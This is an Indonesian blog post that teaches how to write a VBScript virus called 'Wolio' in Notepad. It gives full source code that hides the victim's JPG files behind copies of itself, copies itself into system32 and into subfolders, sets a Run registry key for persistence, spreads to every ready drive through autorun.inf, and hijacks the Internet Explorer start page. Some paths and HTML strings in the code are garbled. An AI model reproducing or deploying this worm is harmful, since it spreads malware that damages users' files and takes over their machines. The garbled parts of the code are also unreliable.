Diberdayakan oleh Blogger.

Paling Banyak Dilihat

Membuat Virus VBS Melalui Notepad

Artikel kali ini akan membahas bagaimana cara membuat virus melalui Notepad dengan menggunakan Visual Basic Script(VBS).
 
Sebelumnya kita ketahui dahulu sistem kerjanya adalah sebagai berikut :
 
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah
    ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file, sehingga akan
    dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows.
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart.
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk.
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer.

Nah, Untuk lebih jelasnya kita akan pelajari dari script dibawah ini :
 
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan cara kerja diatas :

Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,".")) & "jpeg")
set fbackup = fso.GetFile(Left(target,instrrev(target,".")) & "jpeg")
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,".")) & "jpg " & ".vbs")
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)="jpg") then serangan_jpg(filetarget)
Next
End Sub

2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flashdisk dan kemudian menularinya. 

Sub serangan_drive()
Set fso = CreateObject("Scripting.FileSystemObject")
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & "" & "wolio.vbs")
If drive.DriveType = 1 And drive.DriveLetter > "C:" Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & "" & "autorun.inf",False)
fileautorun.WriteLine("[AUTORUN]")
fileautorun.WriteLine("RUN=wolio.vbs")
End If
End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan.

Sub serangan_ie()
If (regedit.RegRead("HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page")<>"c:\windows\system32\wolio.html") Then
regedit.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page","c:\windows\system32\wolio.html"
End If
End Sub

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
 
Sub buat_html()
set filehtml = fso.CreateTextFile("c:windowssystem32wolio.html",True)
filehtml.WriteLine("")
filehtml.WriteLine("")
")
filehtml.WriteLine("Welcome to Wolio")
filehtml.WriteLine("filehtml.WriteLine("")
filehtml.WriteLine("")
filehtml.WriteLine("")
filehtml.WriteLine("")
filehtml.WriteLine("")
filehtml.WriteLine("Selamat Datang di Wolio VBS ")
filehtml.WriteLine("")
filehtml.WriteLine("")
End Sub
 
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
 
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & "wolio.vbs")
carifilejpg(subfolder)
next
End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk menyebarkan variabel dan memangggil semua prosedur.
 
on error resume next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject("Scripting.FileSystemObject")
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject("WScript.Shell")
myfolder = Left(fsource,InStrRev(fsource,""))
' Copy-kan diri ke "c:windowssystem32"
fsource.Copy("c:windowssystem32wolio.vbs")
' Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
' Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
' Regitry
if
(regedit.RegRead("HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio")<>"c:\win
dows\system32\wolio.vbs") Then
regedit.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio","c:\windows\system32\wolio.
vbs"
End If
' Copy-kan diri ke semua drive aktif
serangan_drive()
' Buat file wolio.html
buat_html()
' Ubah Start Page di Internet Explorer
serangan_ie()
 


Baca Juga Artikel Lainnya:

Posted by nitrowebster

Labels:

0 comments:

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =))

Posting Komentar

Tuliskan komentar Anda, karena komentar Anda sangat berguna untuk perkembangan blog ini,dengan kata-kata yang baik dan sopan. Jika Anda berkomentar berupa pertanyaan dengan menggunakan opsi 'Anonim', maka pertanyaan Anda tidak akan ditanggapi. NO SPAM, NO SARA.